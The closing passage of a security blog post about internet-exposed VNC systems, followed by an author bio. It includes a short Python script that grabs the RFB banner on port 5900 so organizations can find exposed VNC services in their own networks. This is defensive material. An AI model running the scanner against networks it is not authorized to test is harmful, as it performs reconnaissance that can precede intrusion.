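One practical defensive takeaway: the systems in this offering were reachable over plain VNC from the internet. A VNC server announces itself with an “RFB xxx.yyy” version banner as soon as a client connects on TCP 5900, so an organization can check its own address space for the same exposure. Below is a minimal sketch; the addresses are placeholders, and you should only scan networks you are authorized to test.

    # Check hosts for an internet-exposed VNC service by reading the RFB
    # banner a VNC server sends (e.g. b"RFB 003.008\n") on connect.
    # Placeholder (TEST-NET) addresses; scan only networks you own.
    import socket

    HOSTS = ["192.0.2.10", "192.0.2.11"]

    def vnc_exposed(host, port=5900, timeout=3.0):
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                banner = sock.recv(12)
            return banner.startswith(b"RFB ")
        except OSError:
            return False

    for h in HOSTS:
        status = "EXPOSED (VNC banner received)" if vnc_exposed(h) else "no VNC response"
        print(h + ":5900 -> " + status)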

About the Author: Idan Aharoni is the founder & CEO of Inteller, a leading provider of web intelligence solutions. Idan was the Head of Cyber Intelligence at RSA, where he was responsible for gathering, analyzing and reporting intelligence findings on cybercrime and fraud activity. Idan joined Cyota (later acquired by RSA) in February 2005 as an analyst at the Anti-Fraud Command Center. In 2006, he founded the FraudAction Intelligence team, which he led until 2013. Through his work at the Anti-Fraud Command Center and the unique insight gained from the intelligence and discoveries gathered by his team at RSA, Idan offers vast expertise in the underground fraud economy and how cybercriminals operate.

This was cross-posted from the Inteller Solutions blog.

Related: Learn More at the 2015 ICS Cyber Security Conference

Copyright 2010 Respective Author at Infosec Island]]>